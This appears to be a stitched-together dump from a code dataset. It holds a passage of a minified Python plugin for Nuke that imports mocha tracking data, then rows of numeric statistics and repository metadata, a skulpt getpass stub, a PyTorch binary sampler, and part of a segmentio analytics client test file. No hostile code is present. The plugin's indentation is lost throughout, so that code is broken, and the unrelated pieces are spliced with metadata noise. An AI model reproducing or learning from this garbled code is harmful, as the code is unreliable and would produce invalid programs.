aE.setTooltip('at this frame, the shapes will preserve their position when the tracking data is loaded.')
aE.setValue(True)
node.addKnob(aE)
en(node)
def en(node):
aE = node['useCurrentFrameAsReferenceFrame']
bq = node['referenceFrameMI']
if not aE:
return
if not bq:
return
gw = not aE.getValue()
bq.setEnabled(gw)
def bX():
node = b.thisNode()
knob = b.thisKnob()
if knob.name() == 'useCurrentFrameAsReferenceFrame':
en(node)
def cO():
node = b.thisNode()
knob = b.thisKnob()
if knob.name() == 'curves':
if node.knob('trackingDataLayerMI'):
gx = node['trackingDataLayerMI']
cK = cI(knob)
cL = ej(cK)
gx.setValues(cL)
b.addKnobChanged(cO, nodeClass='RotoPaint')
b.addKnobChanged(cO, nodeClass='Roto')
b.addKnobChanged(cO, nodeClass='SplineWarp3')
b.addKnobChanged(bX, nodeClass='RotoPaint')
b.addKnobChanged(bX, nodeClass='Roto')
b.addKnobChanged(bX, nodeClass='GridWarp3')
b.addKnobChanged(bX, nodeClass='SplineWarp3')
def gy():
bY = b.createNode('GridWarp3')
be(bY, 'mochaimport.RotoPaintNodeMI___loadTransformMatrixFromFilePopupGridWarp(nuke.thisNode())',
'mochaimport.RotoPaintNodeMI___loadTransformMatrixFromFromClipboardGridWarp(nuke.thisNode())')
el(bY)
bY['label'].setValue('MochaImport+')
return bY
def RotoPaintNodeMI___loadTransformMatrixFromFilePopupGridWarp(node):
try:
k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
if k == None:
return
j = an(k)
eo(node, j, 'source_grid_transform_matrix')
except IOError as f:
b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
except cornerPinData___FileFormatError as f:
b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
return
def RotoPaintNodeMI___loadTransformMatrixFromFromClipboardGridWarp(node):
try:
j = ao()
eo(node, j, 'source_grid_transform_matrix')
except cornerPinData___FileFormatError as f:
b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def eo(node, d, gz):
referenceFrame = em(node)
bp = cu(d, referenceFrame)
bp.applyToArrayKnob(node[gz])
import nuke as b
import os as al
import nuke as b
def hn(ep):
for n in ep:
n.autoplace()
for n in ep:
b.autoplaceSnap(n)
class gA(object):
"""places nodes in a regular grid distance relative to each other"""
def __init__(a):
a.setGridSize(140, 120)
def setGridSize(a, gB, gC):
a.dx = gB
a.dy = gC
def placeNodeRelativeToNode(a, bZ, ca, ac, aJ):
"""places nodeToPlace x (y) grid steps away from nodeReference in x (y) direction"""
gD = ca.screenWidth() - bZ.screenWidth()
gE = ca.screenHeight() - bZ.screenHeight()
bZ.setXpos(ca.xpos() + ac * a.dx + gD / 2)
bZ.setYpos(ca.ypos() + aJ * a.dy + gE / 2)
import re
def cP(gF):
for n in b.selectedNodes():
n.setSelected(False)
gF.setSelected(True)
def gG():
q = b.getFilename('Load from mocha FBX 6.1.0 3D Data for Nuke 6.3v7', '*.fbx')
if q == None or not al.path.isfile(q):
return
else:
if not q.lower().endswith('.fbx'):
b.message(
"filename must end with .fbx\nPlease choose a file exported with mocha Pro's camera module choosing the format named 'FBX 6.1.0 3D Data for Nuke 6..3v7 (*.fbx)'")
return
cQ(q)
cR(q)
return
def cQ(q):
cS = b.createNode('Camera2', 'file "%s" read_from_file True' % q)
cS['fbx_node_name'].setValue('MochaCameraNode')
aK = gH(q)
cS['label'].setValue(aK)
return cS
def cR(q):
cT = b.createNode('ReadGeo2', 'file "%s"' % q)
cT['object_type'].setValue('Point Cloud')
cT['label'].setValue('MochaImport+')
return cT
def gI():
q = b.getFilename('Load from mocha FBX 6.1.0 3D Data for Nuke 6.3v7', '*.fbx')
if q == None or not al.path.isfile(q):
return
else:
if not q.lower().endswith('.fbx'):
b.message(
"filename must end with .fbx\nPlease choose a file exported with mocha Pro's camera module choosing the format named 'FBX 6.1.0 3D Data for Nuke 6..3v7 (*.fbx)'")
return
eq(q)
return
def eq(q):
selectedNode = False
if b.nodesSelected():
selectedNode = b.selectedNode()
P = cQ(q)
br = cR(q)
bs = b.createNode('Scene')
bt = b.createNode('ScanlineRender')
aF = b.createNode('TransformGeo')
aq = b.createNode('Axis2')
bs.setInput(0, aF)
bs.setInput(1, P)
aF.setInput(0, br)
aF.setInput(1, aq)
P.setInput(0, aq)
bt.setInput(1, bs)
bt.setInput(2, P)
aG = gA()
if selectedNode:
bt.setInput(0, selectedNode)
aG.placeNodeRelativeToNode(P, selectedNode, 2, 0)
aG.placeNodeRelativeToNode(bs, P, -1, 0)
aG.placeNodeRelativeToNode(bt, P, -1, 1)
aG.placeNodeRelativeToNode(aF, P, -1, -1)
aG.placeNodeRelativeToNode(aq, P, 0, -1)
aG.placeNodeRelativeToNode(br, P, -2, -1)
br.setName('PointCloud')
aq['label'].setValue('OrientWorld')
br['help'].setValue(
'renders the point cloud imported from the mocha camera track. Each tracked layer contributes 5 points (four corners + center of surface rectangle)')
P['help'].setValue('camera imported from mocha camera track')
aq['help'].setValue(
'use this node to orient the camera track in your scene as desired (e.g. make the ground plane horizontal etc...)')
aF['help'].setValue('applies your world transformations from node ' + aq.name() + ' to the point cloud')
cU = [P, br, bs, bt, aF, aq]
cP(P)
for node in cU:
node.setSelected(True)
er = gJ()
er['label'].setValue('camera rig')
cU.append(er)
for node in cU:
node.hideControlPanel()
def gH(path):
filename = al.path.basename(path)
aK = filename + '\nMochaImport+'
return aK
def gJ():
aH = b.selectedNodes()
if not aH:
return b.nodes.BackdropNode(tile_color=int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16),
note_font_color=4294967040, note_font_size=36, name='MochaImport+')
cV = min([node.xpos() for node in aH])
cW = min([node.ypos() for node in aH])
es = max([node.xpos() + node.screenWidth() for node in aH]) - cV
et = max([node.ypos() + node.screenHeight() for node in aH]) - cW
eu, ev, gK, gL = (-10, -80, 10, 10)
cV += eu
cW += ev
es += gK - eu
et += gL - ev
n = b.nodes.BackdropNode(xpos=cV, bdwidth=es, ypos=cW, bdheight=et,
tile_color=int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16),
note_font_color=4294967040, note_font_size=36, name='MochaImport+')
n['selected'].setValue(True)
for node in aH:
node['selected'].setValue(True)
return n
import nuke as b
import os as al
def cX(cb):
"""
recursively return all nodes starting at topLevel. Default topLevel is nuke.root()
"""
allNodes = b.allNodes(group=cb)
for n in allNodes:
allNodes = allNodes + cX(n)
return allNodes
def ew(node):
"""
Return a dictionary of the nodes and pipes that are connected to node
"""
cY = {}
gM = node.dependent(b.INPUTS | b.HIDDEN_INPUTS)
for p in gM:
cY[p] = []
for c in range(p.inputs()):
if p.input(c) == node:
cY[p].append(c)
return cY
def gN(node):
"""
return True if node is gizmo
"""
return 'gizmo_file' in node.knobs()
def cZ(r):
"""Check if gizmo is in default install path"""
da = al.path.dirname(b.EXE_PATH)
ex = r.filename()
gO = set(da.split('/'))
gP = set(ex.split('/'))
gP.issubset(gO)
cZ = al.path.commonprefix([da, ex]) == da
return cZ
def gQ(n):
"""
return n's parent node, return nuke.root()n is on the top level
"""
return b.toNode('.'.join(n.fullName().split('.')[:-1])) or b.root()
def db(r):
"""
copy gizmo to group and replace it in the tree, so all inputs and outputs use the new group.
returns the new group node
"""
ey = gQ(r)
gR = b.tcl(
'global no_gizmo; set no_gizmo 1; in %s {%s -New} ; return [value [stack 0].name]' % (ey.fullName(), r.Class()))
group = b.toNode('.'.join((ey.fullName(), gR)))
group.setSelected(False)
if ew(r):
for node, gS in ew(r).iteritems():
for c in gS:
node.setInput(c, group)
for c in range(r.inputs()):
group.setInput(c, r.input(c))
group.setXYpos(r.xpos(), r.ypos())
group.readKnobs(r.writeKnobs(b.TO_SCRIPT))
b.delete(r)
return group
def ho(cb=b.root(), gT=False):
for n in cX(cb):
n.setSelected(False)
for n in cX(cb):
try:
if gN(n):
if not cZ(n):
db(n)
elif not gT:
db(n)
except ValueError:
pass
def gU(r):
return dc(r)
def gV(gW):
return dc(gW)
def gX(gY):
return dc(gY)
def dc(r):
for gZ in b.allNodes():
gZ.knob('selected').setValue(False)
ha = r.knob('name').value()
hb = r.knob('tile_color').value()
group = db(r)
group.knob('name').setValue(ha)
group.knob('tile_color').setValue(hb)
return group
cc = True
class MiUnsupportedNodeTypeError(Exception):
def __init__(a, value):
a.value = value
def __str__(a):
return repr(a.value)
def createStabilizedView():
"""Creates a Stabilized View Rig
:returns: nothing
"""
global cc
y = b.createNode('StartStabilized')
dd = b.createNode('Dot', '', False)
de = b.createNode('Dot', '', False)
w = b.createNode('EndStabilized')
if cc:
y = gV(y)
w = gX(w)
y['tile_color'].setValue(int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16))
w['tile_color'].setValue(int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16))
w.connectInput(2, y)
stabilizedPrecompNode___connectPrecompNodes(y, w)
cd = 250
df = 250
ez = 50
eA = 7
cP(dd)
de.setSelected(True)
eB = b.nodes.BackdropNode(xpos=y.xpos() + cd / 2, bdwidth=cd * 1.5, ypos=y.ypos() - ez, bdheight=df + 2 * ez,
tile_color=int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16),
note_font_color=4294967040, note_font_size=36, name='MochaImport+')
eB['label'].setValue('Stabilized View+')
dd.setXpos(y.xpos() + cd)
dd.setYpos(y.ypos() + eA)
de.setXpos(y.xpos() + cd)
de.setYpos(y.ypos() + df + eA)
w.setXpos(y.xpos())
w.setYpos(y.ypos() + df)
eB['help'].setValue(
"\n<h2>Basic Usage of Stabilized View Rig</h2>\n<ol>\n<li>From the MochaImport+ menu, create the stabilized view rig consisting of the StartStabilized node, the EndStabilized node, and the Stabilized View Backdrop.</li>\n<li>Load your mocha tracking data in the StartStabilized node.\n</li><li>Do arbitrary manipulations in the Stabilized View by inserting new nodes inside the backdrop. All changes you do there in a stabilized setting will also be visible in your original perspective after the EndStabilized node.</li>\n</ol>\n\n<h2>Lens Distortion</h2>\n<p>If you've used the mocha Lens module to analyze the lens distortion of your clip, you need to do the following things to get an undistorted stabilized view and reapply the lens distortion to the final result:\n</p><ul>\n<li>make sure the mocha corner pin data you load into the StartStabilized node is exported from mocha Pro with the option 'Remove lens distortion'</li>\n<li>as UndistMap input of the StartStabilized node use a Distortion Map Clip (ST Map) exported with the mocha Pro lens module with option 'undistort'.</li>\n<li>as DistMap input of the EndStabilized node use a Distortion Map Clip (ST Map) exported with the mocha Pro lens module with option 'distort'.</li>\n</ul>".replace(
'\n', '').replace('\r', ''))
def createCornerPin():
"""Creates a CornerPin with Lens Distortion node
By default, a CornerPin with Lens Distortion is a group node. If mochaimport___setUseGizmos(True) has been called before,
it will be a gizmo instead of a group.
:returns: the created node
"""
i = b.createNode('CornerPinMI')
i['tile_color'].setValue(int('%02x%02x%02x%02x' % (232.05, 145.095, 0, 255), 16))
if cc:
i = gU(i)
return i
def createTracker3Node():
"""Creates a Tracker+ (old) node
A Tracker+ (old) node is a Tracker3 node that is extended with the ability to load mocha tracking data
:returns: the created node
"""
return fQ()
def createTracker4Node():
"""Creates a Tracker+ node
A Tracker+ node is a Tracker4 node that is extended with the ability to load mocha tracking data
:returns: the created node
"""
return fR()
def createTransformNodeMI():
gj()
def createRotoPaintNodeMI():
"""Creates a RotoPaint+ node
A RotoPaint+ node is a RotoPaint node that is extended with the ability to load mocha tracking data
:returns: the created node
"""
return gr()
def createRotoNodeMI():
"""Creates a Roto+ node
A Roto+ node is a Roto node that is extended with the ability to load mocha tracking data
:returns: the created node
"""
return gs()
def createGridWarpNodeMI():
"""Creates a GridWarp+ node
A GridWarp+ node is a GridWarp3 node that is extended with the ability to load mocha tracking data
:returns: the created node
"""
return gy()
def createSplineWarpNodeMI():
"""Creates a SplineWarp+ node
A SplineWarp+ node is a SplineWarp3 node that is extended with the ability to load mocha tracking data
:returns: the created node
"""
return gt()
def createCameraAndPointCloud(mochaFbxFilePath=None):
"""Creates a camera node and a point cloud node for a fbx file exported from mocha
The function sets all options of the two nodes to interpret the fbx file from mocha properly.
If None is given as mochaFbxFilePath, the function shows a open file dialog to choose an fbx file.
"""
if mochaFbxFilePath == None:
gG()
else:
cQ(mochaFbxFilePath)
cR(mochaFbxFilePath)
return
def createCameraRig(mochaFbxFilePath=None):
"""Creates a mocha camera rig for a fbx file exported from mocha
If None is given as mochaFbxFilePath, the function shows a open file dialog to choose an fbx file
"""
if mochaFbxFilePath == None:
gI()
else:
eq(mochaFbxFilePath)
return
def hp():
return dp('MochaImport+', 'mochaimportnuke', '743985')
def showSettings():
"""Shows the settings dialog of MochaImport+"""
cq = dz()
cq.abag()
def setUseGizmos(value=True):
"""Force MochaImport+ to use gizmos instead of groups for stabilized views and corner pins.
Note that this breaks compatibility with machines where MochaImport+ is not installed.
"""
global cc
cc = not value
def applyMochaDataToNode(node, cornerpinData, referenceFrame=1, layerIndex=0):
"""Applies mocha cornerpin data to a node
the node can have any of the node types supported by MochaImport+.
:param node: the node to which the mocha tracking data should be applied
:param cornerpinData: mocha corner pin data represented as a string
:param referenceFrame: at which frame the moved object should be unchanged (only for the node types that have this control in their MochaImport+ tab)
:param layerIndex: to which layer of the node the trackingdata is applied (optional, only for Roto, RotoPaint and SplineWarp nodes)
"""
hc = [
'Transform', 'Tracker3', 'Tracker4', 'Group', 'GridWarp3', 'SplineWarp3', 'Roto', 'RotoPaint', 'CornerPinMI',
'StartStabilized']
if node.Class() not in hc:
raise MiUnsupportedNodeTypeError('cannot apply mocha tracking data to node of class: ' + node.Class())
if node.Class() == 'Group' and (
node.knob('pin1') == None or node.knob('pin2') == None or node.knob(
'pin3') == None or node.knob(
'pin4') == None):
raise MiUnsupportedNodeTypeError(
"Can only apply tracking data to groups, if they have the knobs 'pin1', 'pin2', 'pin3' and 'pin4'")
d = bz(cornerpinData)
if node.Class() == 'Transform':
u = bV(d)
cH(node, u)
elif node.Class() == 'Tracker3':
cx(node, d)
elif node.Class() == 'Tracker4':
cA(node, d)
elif node.Class() in ('Group', 'CornerPinMI', 'StartStabilized'):
dg(d, node['pin1'], node['pin2'], node['pin3'], node['pin4'])
elif node.Class() == 'GridWarp3':
bp = cu(d, referenceFrame)
bp.applyToArrayKnob(node['source_grid_transform_matrix'])
elif node.Class() in ('SplineWarp3', 'Roto', 'RotoPaint'):
cM(node, d, layerIndex, referenceFrame)
return
def hq():
eC = 'corner pin'
hd = 'apply distortion'
he = 'distortion map'
i = b.nodes.CornerPin2D(name=eC)
ce = b.nodes.STMap(name=hd, disable=True)
eD = b.nodes.Read(name=he)
if b.nodesSelected():
eE = b.selectedNode()
fJ(eE, ce)
i.setInput(0, eE)
ce.setInput(0, i)
ce.setInput(1, eD)
cP(i)
ce.setSelected(True)
eD.setSelected(True)
aI = b.collapseToGroup()
aI.setName('corner pin MI')
i = aI.node(eC)
eM(aI)
aI.addKnob(b.Text_Knob('divName', '', ''))
eN(i, aI)
i['to1'].setExpression('parent.pin1.x(t+parent.pinTimeOffset)', 0)
i['to1'].setExpression('parent.pin1.y(t+parent.pinTimeOffset)', 1)
i['to2'].setExpression('parent.pin2.x(t+parent.pinTimeOffset)', 0)
i['to2'].setExpression('parent.pin2.y(t+parent.pinTimeOffset)', 1)
i['to3'].setExpression('parent.pin3.x(t+parent.pinTimeOffset)', 0)
i['to3'].setExpression('parent.pin3.y(t+parent.pinTimeOffset)', 1)
i['to4'].setExpression('parent.pin4.x(t+parent.pinTimeOffset)', 0)
i['to4'].setExpression('parent.pin4.y(t+parent.pinTimeOffset)', 1)
fK(aI)
| 206.376296
| 63,435
| 0.877122
| 20,800
| 417,912
| 17.606875
| 0.459471
| 0.001229
| 0.001425
| 0.000601
| 0.07505
| 0.065231
| 0.061037
| 0.053033
| 0.048334
| 0.046286
| 0
| 0.081809
| 0.042844
| 417,912
| 2,024
| 63,436
| 206.478261
| 0.833733
| 0.000352
| 0
| 0.282152
| 0
| 0.035433
| 0.882903
| 0.857663
| 0
| 1
| 0
| 0
| 0.004593
| 0
| null | null | 0.001312
| 0.055118
| null | null | 0.003281
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ee28d90df22e59c0bffffb33f424e6b583f751a
| 39
|
py
|
Python
|
src/lib/getpass.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/getpass.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/getpass.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("getpass")
| 19.5
| 38
| 0.769231
| 6
| 39
| 4.166667
| 0.666667
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 39
| 1
| 39
| 39
| 0.694444
| 0
| 0
| 0
| 0
| 0
| 0.179487
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
6f0bd92ea44bbc9f15ce7ddb2215e5b1bde4616e
| 6,267
|
py
|
Python
|
PAS/debm/sampling/nb_sampler.py
|
ha0ransun/Path-Auxiliary-Sampler
|
a93912beda8e264f04704180e505a1b333f227c8
|
[
"MIT"
] | 2
|
2022-03-15T09:08:56.000Z
|
2022-03-19T08:19:06.000Z
|
PAS/debm/sampling/nb_sampler.py
|
ha0ransun/Path-Auxiliary-Sampler
|
a93912beda8e264f04704180e505a1b333f227c8
|
[
"MIT"
] | null | null | null |
PAS/debm/sampling/nb_sampler.py
|
ha0ransun/Path-Auxiliary-Sampler
|
a93912beda8e264f04704180e505a1b333f227c8
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
class NBSampler(nn.Module):
def __init__(self, R):
print('our binary sampler')
super().__init__()
self.R_list = []
self.R = R
self.count = 0
self.succ = 0
def step(self, x, model):
bsize = x.shape[0]
x_rank = len(x.shape) - 1
radius = torch.randint(1, self.R * 2, size=(bsize, 1))
self.R_list.append(radius)
max_r = torch.max(radius).item()
r_mask = torch.arange(max_r).expand(bsize, max_r) < radius
r_mask = r_mask.float().to(x.device)
x = x.requires_grad_()
score_x = model(x)
grad_x = torch.autograd.grad(score_x.sum(), x)[0].detach()
b_idx = torch.arange(bsize).to(x.device)
with torch.no_grad():
cur_x = x.clone()
idx_list = []
delta_x = -(2.0 * cur_x - 1.0)
score_change_x = delta_x * grad_x / 2.0
prob_x = torch.softmax(score_change_x, dim=-1)
for step in range(max_r):
index = torch.multinomial(prob_x, 1).view(-1)
cur_bits = cur_x[b_idx, index]
new_bits = 1.0 - cur_bits
cur_r_mask = r_mask[:, step]
cur_x[b_idx, index] = cur_r_mask * new_bits + (1.0 - cur_r_mask) * cur_bits
prob_x[b_idx, index] = 0
idx_list.append(index)
y = cur_x
y = y.requires_grad_()
score_y = model(y)
grad_y = torch.autograd.grad(score_y.sum(), y)[0].detach()
with torch.no_grad():
r_idx = torch.arange(max_r).to(x.device).view(1, -1)
idx_all = torch.stack(idx_list, dim=1) # bsize x max_r
# fwd from x -> y
change_fwd = score_change_x.unsqueeze(1).repeat(1, max_r, 1)
for i, idx in enumerate(idx_list):
for j in range(i + 1, max_r):
change_fwd[b_idx, torch.LongTensor([j] * bsize).to(x.device), idx] = -float('inf')
log_fwd = torch.log_softmax(change_fwd, dim=-1)
log_fwd = torch.sum(log_fwd[b_idx.view(-1, 1), r_idx, idx_all] * r_mask, dim=-1) + score_x.view(-1)
# backwd from y -> x
delta_y = -(2.0 * y - 1.0)
score_change_y = delta_y * grad_y / 2.0
change_bwd = score_change_y.unsqueeze(1).repeat(1, max_r, 1)
for i, idx in enumerate(idx_list):
for j in range(i):
change_bwd[b_idx, torch.LongTensor([j] * bsize).to(x.device), idx] = -float('inf')
log_bwd = torch.log_softmax(change_bwd, dim=-1)
log_bwd = torch.sum(log_bwd[b_idx.view(-1,1), r_idx, idx_all] * r_mask, dim=-1) + score_y.view(-1)
log_acc = log_bwd - log_fwd
accepted = (log_acc.exp() >= torch.rand_like(log_acc)).float().view(-1, *([1] * x_rank))
new_x = y * accepted + (1.0 - accepted) * x
self.count += bsize
self.succ += accepted.sum()
return new_x
@property
def avgR(self):
return torch.stack(self.R_list, dim=-1).float().mean().item()
class NBASampler(nn.Module):
def __init__(self):
print('our binary sampler')
super().__init__()
self.R_list = []
self.count = 0
self.succ = 0
def step(self, x, model):
bsize = x.shape[0]
x_rank = len(x.shape) - 1
x = x.requires_grad_()
score_x = model(x)
grad_x = torch.autograd.grad(score_x.sum(), x)[0].detach()
b_idx = torch.arange(bsize).to(x.device)
with torch.no_grad():
cur_x = x.clone()
idx_list = []
delta_x = -(2.0 * cur_x - 1.0)
score_change_x = delta_x * grad_x / 2.0
prob_x = torch.softmax(score_change_x, dim=-1)
radius = (prob_x > 0.02).sum(dim=1, keepdim=True) + 1
self.R_list.append(radius)
max_r = torch.max(radius).item()
r_mask = torch.arange(max_r).to(x.device).expand(bsize, max_r) < radius
r_mask = r_mask.float().to(x.device)
for step in range(max_r):
index = torch.multinomial(prob_x, 1).view(-1)
cur_bits = cur_x[b_idx, index]
new_bits = 1.0 - cur_bits
cur_r_mask = r_mask[:, step]
cur_x[b_idx, index] = cur_r_mask * new_bits + (1.0 - cur_r_mask) * cur_bits
prob_x[b_idx, index] = 0
idx_list.append(index)
y = cur_x
y = y.requires_grad_()
score_y = model(y)
grad_y = torch.autograd.grad(score_y.sum(), y)[0].detach()
with torch.no_grad():
r_idx = torch.arange(max_r).to(x.device).view(1, -1)
idx_all = torch.stack(idx_list, dim=1) # bsize x max_r
# fwd from x -> y
change_fwd = score_change_x.unsqueeze(1).repeat(1, max_r, 1)
for i, idx in enumerate(idx_list):
for j in range(i + 1, max_r):
change_fwd[b_idx, torch.LongTensor([j] * bsize).to(x.device), idx] = -float('inf')
log_fwd = torch.log_softmax(change_fwd, dim=-1)
log_fwd = torch.sum(log_fwd[b_idx.view(-1, 1), r_idx, idx_all] * r_mask, dim=-1) + score_x.view(-1)
# backwd from y -> x
delta_y = -(2.0 * y - 1.0)
score_change_y = delta_y * grad_y / 2.0
change_bwd = score_change_y.unsqueeze(1).repeat(1, max_r, 1)
for i, idx in enumerate(idx_list):
for j in range(i):
change_bwd[b_idx, torch.LongTensor([j] * bsize).to(x.device), idx] = -float('inf')
log_bwd = torch.log_softmax(change_bwd, dim=-1)
log_bwd = torch.sum(log_bwd[b_idx.view(-1,1), r_idx, idx_all] * r_mask, dim=-1) + score_y.view(-1)
log_acc = log_bwd - log_fwd
accepted = (log_acc.exp() >= torch.rand_like(log_acc)).float().view(-1, *([1] * x_rank))
new_x = y * accepted + (1.0 - accepted) * x
self.count += bsize
self.succ += accepted.sum()
return new_x
@property
def avgR(self):
return torch.stack(self.R_list, dim=-1).float().mean().item()
| 40.960784
| 111
| 0.532631
| 957
| 6,267
| 3.240334
| 0.098224
| 0.023218
| 0.031925
| 0.027088
| 0.959368
| 0.947114
| 0.947114
| 0.944212
| 0.944212
| 0.944212
| 0
| 0.026042
| 0.325993
| 6,267
| 152
| 112
| 41.230263
| 0.708097
| 0.015478
| 0
| 0.914729
| 0
| 0
| 0.007788
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.015504
| 0.015504
| 0.108527
| 0.015504
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f28aa8519caf6e9374ace560d79027c5dd8933b
| 9,469
|
py
|
Python
|
segmentio/test/client.py
|
enderlabs/segment-python
|
ae918efba9be3a148b1a9ac1795f017a72b164b8
|
[
"Unlicense",
"MIT"
] | null | null | null |
segmentio/test/client.py
|
enderlabs/segment-python
|
ae918efba9be3a148b1a9ac1795f017a72b164b8
|
[
"Unlicense",
"MIT"
] | null | null | null |
segmentio/test/client.py
|
enderlabs/segment-python
|
ae918efba9be3a148b1a9ac1795f017a72b164b8
|
[
"Unlicense",
"MIT"
] | null | null | null |
from datetime import datetime
import unittest
import time
import six
from segmentio.version import VERSION
from segmentio.client import Client
class TestClient(unittest.TestCase):
def fail(self, e, batch):
"""Mark the failure handler"""
self.failed = True
def setUp(self):
self.failed = False
self.client = Client('testsecret', on_error=self.fail)
def test_requires_write_key(self):
self.assertRaises(AssertionError, Client)
def test_empty_flush(self):
self.client.flush()
def test_basic_track(self):
client = self.client
success, msg = client.track('userId', 'python test event')
client.flush()
self.assertTrue(success)
self.assertFalse(self.failed)
self.assertEqual(msg['event'], 'python test event')
self.assertTrue(isinstance(msg['timestamp'], str))
self.assertTrue(isinstance(msg['messageId'], str))
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['properties'], {})
self.assertEqual(msg['type'], 'track')
def test_advanced_track(self):
client = self.client
success, msg = client.track(
'userId', 'python test event', { 'property': 'value' },
{ 'ip': '192.168.0.1' }, datetime(2014, 9, 3), 'anonymousId',
{ 'Amplitude': True })
self.assertTrue(success)
self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
self.assertEqual(msg['properties'], { 'property': 'value' })
self.assertEqual(msg['integrations'], { 'Amplitude': True })
self.assertEqual(msg['context']['ip'], '192.168.0.1')
self.assertEqual(msg['event'], 'python test event')
self.assertEqual(msg['anonymousId'], 'anonymousId')
self.assertEqual(msg['context']['library'], {
'name': 'analytics-python',
'version': VERSION
})
self.assertTrue(isinstance(msg['messageId'], str))
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'track')
def test_basic_identify(self):
client = self.client
success, msg = client.identify('userId', { 'trait': 'value' })
client.flush()
self.assertTrue(success)
self.assertFalse(self.failed)
self.assertEqual(msg['traits'], { 'trait': 'value' })
self.assertTrue(isinstance(msg['timestamp'], str))
self.assertTrue(isinstance(msg['messageId'], str))
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'identify')
def test_advanced_identify(self):
client = self.client
success, msg = client.identify(
'userId', { 'trait': 'value' }, { 'ip': '192.168.0.1' },
datetime(2014, 9, 3), 'anonymousId', { 'Amplitude': True })
self.assertTrue(success)
self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
self.assertEqual(msg['integrations'], { 'Amplitude': True })
self.assertEqual(msg['context']['ip'], '192.168.0.1')
self.assertEqual(msg['traits'], { 'trait': 'value' })
self.assertEqual(msg['anonymousId'], 'anonymousId')
self.assertEqual(msg['context']['library'], {
'name': 'analytics-python',
'version': VERSION
})
self.assertTrue(isinstance(msg['timestamp'], str))
self.assertTrue(isinstance(msg['messageId'], str))
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'identify')
def test_basic_group(self):
client = self.client
success, msg = client.group('userId', 'groupId')
client.flush()
self.assertTrue(success)
self.assertFalse(self.failed)
self.assertEqual(msg['groupId'], 'groupId')
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'group')
def test_advanced_group(self):
client = self.client
success, msg = client.group(
'userId', 'groupId', { 'trait': 'value' }, { 'ip': '192.168.0.1' },
datetime(2014, 9, 3), 'anonymousId', { 'Amplitude': True })
self.assertTrue(success)
self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
self.assertEqual(msg['integrations'], { 'Amplitude': True })
self.assertEqual(msg['context']['ip'], '192.168.0.1')
self.assertEqual(msg['traits'], { 'trait': 'value' })
self.assertEqual(msg['anonymousId'], 'anonymousId')
self.assertEqual(msg['context']['library'], {
'name': 'analytics-python',
'version': VERSION
})
self.assertTrue(isinstance(msg['timestamp'], str))
self.assertTrue(isinstance(msg['messageId'], str))
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'group')
def test_basic_alias(self):
client = self.client
success, msg = client.alias('previousId', 'userId')
client.flush()
self.assertTrue(success)
self.assertFalse(self.failed)
self.assertEqual(msg['previousId'], 'previousId')
self.assertEqual(msg['userId'], 'userId')
def test_basic_page(self):
client = self.client
success, msg = client.page('userId', name='name')
self.assertFalse(self.failed)
client.flush()
self.assertTrue(success)
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'page')
self.assertEqual(msg['name'], 'name')
def test_advanced_page(self):
client = self.client
success, msg = client.page(
'userId', 'category', 'name', { 'property': 'value' },
{ 'ip': '192.168.0.1' }, datetime(2014, 9, 3), 'anonymousId',
{ 'Amplitude': True })
self.assertTrue(success)
self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
self.assertEqual(msg['integrations'], { 'Amplitude': True })
self.assertEqual(msg['context']['ip'], '192.168.0.1')
self.assertEqual(msg['properties'], { 'property': 'value' })
